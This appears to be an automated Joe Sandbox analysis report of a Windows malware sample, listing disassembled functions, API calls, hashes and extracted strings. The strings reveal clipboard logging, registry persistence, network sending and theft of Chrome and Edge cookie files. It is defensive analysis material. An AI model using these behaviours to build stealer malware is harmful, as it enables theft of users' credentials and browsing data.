                                • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                • Sleep.KERNEL32(00000BB8), ref: 0041277A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQuerySleepValue
                                • String ID: 8SG$Pj$exepath$hdF
                                • API String ID: 4119054056-3027924918
                                • Opcode ID: f139d5e477cdb60a528e167e6d25b30f1ef806968f795a647c61579ea777c612
                                • Instruction ID: f3cf03c5a64ef847c6da3637c810c9cb64e8e240b2c65477c235684d5dc29c85
                                • Opcode Fuzzy Hash: f139d5e477cdb60a528e167e6d25b30f1ef806968f795a647c61579ea777c612
                                • Instruction Fuzzy Hash: B52148A0B0030427DA00B7366D46EBF724E8B84318F40443FB916E72D3EEBC9C48426D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                • _free.LIBCMT ref: 0044F3BF
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                • _free.LIBCMT ref: 004482D3
                                • _free.LIBCMT ref: 004482FA
                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpen$FileImageName
                                • String ID:
                                • API String ID: 2951400881-0
                                • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 004509D4
                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 004509E6
                                • _free.LIBCMT ref: 004509F8
                                • _free.LIBCMT ref: 00450A0A
                                • _free.LIBCMT ref: 00450A1C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _strpbrk.LIBCMT ref: 0044E738
                                • _free.LIBCMT ref: 0044E855
                                  • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                  • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                  • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                • String ID: *?$.
                                • API String ID: 2812119850-3972193922
                                • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                • String ID: XQG$NG$PG
                                • API String ID: 1634807452-3565412412
                                • Opcode ID: 7fec138d1ea144a01b832ffa58038a5188fed84c46b8d22641351aaff7b95043
                                • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                • Opcode Fuzzy Hash: 7fec138d1ea144a01b832ffa58038a5188fed84c46b8d22641351aaff7b95043
                                • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: `#D$`#D
                                • API String ID: 885266447-2450397995
                                • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000104), ref: 00443475
                                • _free.LIBCMT ref: 00443540
                                • _free.LIBCMT ref: 0044354A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                                • API String ID: 2506810119-3649680502
                                • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                • String ID: /sort "Visit Time" /stext "$0NG
                                • API String ID: 368326130-3219657780
                                • Opcode ID: d963c8d89b197f9409bafdf1745426201732e41158af402883962d053e6a3de4
                                • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                • Opcode Fuzzy Hash: d963c8d89b197f9409bafdf1745426201732e41158af402883962d053e6a3de4
                                • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                                  • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                                  • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • _free.LIBCMT ref: 0044EFD0
                                • _free.LIBCMT ref: 0044F006
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast_abort
                                • String ID: x9k$x9k
                                • API String ID: 2991157371-774530528
                                • Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                                • Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 0040B797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]$hdF
                                • API String ID: 1881088180-1379921833
                                • Opcode ID: f72f7acb6e995bab9069cebdaf7e12266999cf1a5a480981143d2b12499a9b58
                                • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                • Opcode Fuzzy Hash: f72f7acb6e995bab9069cebdaf7e12266999cf1a5a480981143d2b12499a9b58
                                • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _wcslen.LIBCMT ref: 004162F5
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                  • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcslen$CloseCreateValue
                                • String ID: !D@$okmode$PG
                                • API String ID: 3411444782-3370592832
                                • Opcode ID: e94b0a6c45d23510be90e878902f1406fdc2ec5ccb27bc0872e50a1f898fac6a
                                • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                • Opcode Fuzzy Hash: e94b0a6c45d23510be90e878902f1406fdc2ec5ccb27bc0872e50a1f898fac6a
                                • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                Strings
                                • User Data\Default\Network\Cookies, xrefs: 0040C603
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 3f7452b16761e1584c8e2d429d91126a521682e32829e5e9204bb30330905886
                                • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                • Opcode Fuzzy Hash: 3f7452b16761e1584c8e2d429d91126a521682e32829e5e9204bb30330905886
                                • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                Strings
                                • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 6cf461605f9a2c7fe8b2ad0f04ad55fadbe866efa039c7f8a040f60605f6135f
                                • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                • Opcode Fuzzy Hash: 6cf461605f9a2c7fe8b2ad0f04ad55fadbe866efa039c7f8a040f60605f6135f
                                • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                • wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
